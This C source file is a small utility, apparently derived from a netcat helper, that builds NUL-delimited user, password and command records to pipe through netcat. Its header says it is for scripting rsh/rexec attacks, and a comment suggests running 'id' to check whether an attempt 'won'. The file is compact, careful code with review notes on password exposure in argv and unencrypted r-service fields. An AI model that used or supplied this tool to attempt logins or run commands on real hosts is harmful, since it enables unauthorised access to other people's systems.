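/*
 * Generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up
 * rsh/rexec attacks.  Needs to be a prog because shells strip out nulls.
 *
 * args:
 *     locuser remuser [cmd]
 *     remuser passwd  [cmd]
 *
 * cmd defaults to "pwd".
 *
 * ... whatever.  _H*
 *
 * Output on stdout, byte for byte:
 *     NUL  string1 NUL  string2 NUL  cmd NUL  '\n'
 * The leading NUL is an empty first field.  The whole record must fit in
 * buf (4096 bytes) or nothing is written and the program exits 1.
 *
 * NOTE(review): in the second argument form the password is passed in argv,
 * so it is visible to anything that can read the process list while this
 * runs.  The r-service protocols this framing is meant for carry these
 * fields unencrypted -- confirm against the rshd/rexecd documentation.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* change if you like; "id" is a good one for figuring out if you won too */
static char cmd[] = "pwd";

/* Static storage, so it starts out all zero; no memset needed. */
static char buf[4096];

/*
 * Append s and its terminating NUL to buf at offset *used.
 *
 * Returns 0 on success and advances *used past the NUL.  Returns -1, with
 * buf untouched, when the field would leave no room for at least one more
 * byte -- the same limit the original enforced with `y >= sizeof(buf)`.
 * memcpy with a checked length replaces strncpy, which neither guarantees
 * termination nor reports truncation.
 */
static int append_field(const char *s, size_t *used)
{
    size_t len = strlen(s) + 1;            /* field plus its NUL */

    if (len >= sizeof(buf) - *used) {
        return -1;
    }
    memcpy(buf + *used, s, len);
    *used += len;
    return 0;
}

/*
 * Build the NUL-delimited record from argv[1], argv[2] and the optional
 * argv[3], then write it to stdout.
 *
 * Returns 0 on success, 1 on a usage error, an oversized record, or a
 * failed write.
 */
int main(int argc, char *argv[])
{
    size_t used = 1;                       /* buf[0] stays NUL: first null */
    size_t sent = 0;
    const char *command = cmd;

    /* argc is checked instead of probing argv[1], so argc == 0 is safe too */
    if (argc < 3) {
        fprintf(stderr, "wrong! needs 2 or more args.\n");
        return 1;
    }
    if (argc > 3) {
        command = argv[3];
    }

    if (append_field(argv[1], &used) != 0 ||   /* first arg plus another null */
        append_field(argv[2], &used) != 0 ||   /* second arg plus null */
        append_field(command, &used) != 0) {   /* the command, plus final null */
        /* really "record too long for buf"; message kept for compatibility */
        fprintf(stderr, "out of memory!\n");
        return 1;
    }

    /* append_field always leaves at least one free byte for the newline */
    buf[used++] = '\n';                    /* and a newline, so it goes */

    /* write() may be short on a pipe; keep going until the record is out */
    while (sent < used) {
        ssize_t n = write(STDOUT_FILENO, buf + sent, used - sent);

        if (n < 0) {
            perror("write");
            return 1;
        }
        sent += (size_t)n;
    }
    return 0;
}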